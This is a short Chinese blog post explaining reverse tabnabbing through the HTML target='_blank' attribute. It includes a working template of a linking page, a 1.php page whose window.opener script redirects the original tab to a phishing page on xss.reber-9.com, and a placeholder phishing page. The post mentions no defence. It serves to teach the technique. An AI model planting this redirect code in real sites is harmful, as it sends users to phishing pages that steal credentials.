关于_blank

作者: cws | 来源:发表于2016-10-16 22:21 被阅读31次

0x00 _blank

_blank是html中的标签属性,如<a target="_blank" href="http://xss.reber-9.com/1.php">HELLO</a>, 但若点击HELLO打开的网页1.php中有如下代码:

<script>
if(window.opener){
  window.opener.location  = "http://xss.reber-9.com/fish.html";
}
</script>

则原网页将转跳到http://xss.reber-9.com/fish.html ,这就会造成钓鱼

0x01 简单模板

  • a.html内容如下:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Document</title>
</head>
<body>
    <a target="_blank" href="http://xss.reber-9.com/1.php">HELLO</a>
</body>
</html>
  • http://xss.reber-9.com/1.php中1.php内容如下:
<html>
<head>
    <title>test</title>
    <script>
        if(window.opener){
            window.opener.location = "http://xss.reber-9.com/fish.html";
        }
    </script>
</head>
<body>
    <p>hello</p>
</body>
</html>
  • 1.php同级下有个钓鱼模板fish.html,内容如下:
<html>
<head>
    <title>fish</title>
</head>
<body>
    <h2>This is fishing template!</h2>
</body>
</html>
  • 点击a.html中的HELLO则会出现下面的情况,也就导致了钓鱼:
blank.gif

相关文章

  • 关于_blank

    0x00 _blank _blank是html中的标签属性,如 HELLO , 但若点击HELLO打开的网页1.p...

  • 翻译 从空到空 艾米莉 狄金森

    From Blank to Blank From Blank to Blank -- A Threadless W...

  • From Blank to Blank 空空

    From Blank to Blank 空空 by Emily Dickinson From Blank to B...

  • BLANK

    空白 一片空白 没有回礼的礼物 用陈旧的回忆去支付的客栈 人们却从来找不到自己的房间 几十年的徘徊 因为无力而看到...

  • blank……

    where I can go ? Maybe nowhere ! What I can get ? Maybe ...

  • Blank

    今天是周六,阴沉的天下着朦胧细雨,是个自杀的好日子,至少Blank先生是这么认为的,没有精挑细选,只是之前预定好的...

  • blank

    记得小时候,自己还是很能写,而且写的也还不错,作文经常会被当作老师的范文(过年回家,同学聚会提起了这个事情,才意识...

  • [ blank ]

    首发于个人公众号 凌晨时分 意外的风景似乎从来不给你定格、留念的准备时间。恰好是傍晚和煦的阳光,刚好照在单车道上:...

  • Blank

    今天我的大脑一片空白,什么想法都没有… 甚至于,曾经最熟悉的单词,突然间都怀疑起我记忆的拼写有没有出错… 最近,整...

  • #Blank

    Blank是空白页 我的心就是一张空白页 以前我也会厚着脸皮说自己是一个有趣的人 是一个乐观到摁灭痛苦的人 我现在...

网友评论

    本文标题:关于_blank

    本文链接:https://www.haomeiwen.com/subject/inrayttx.html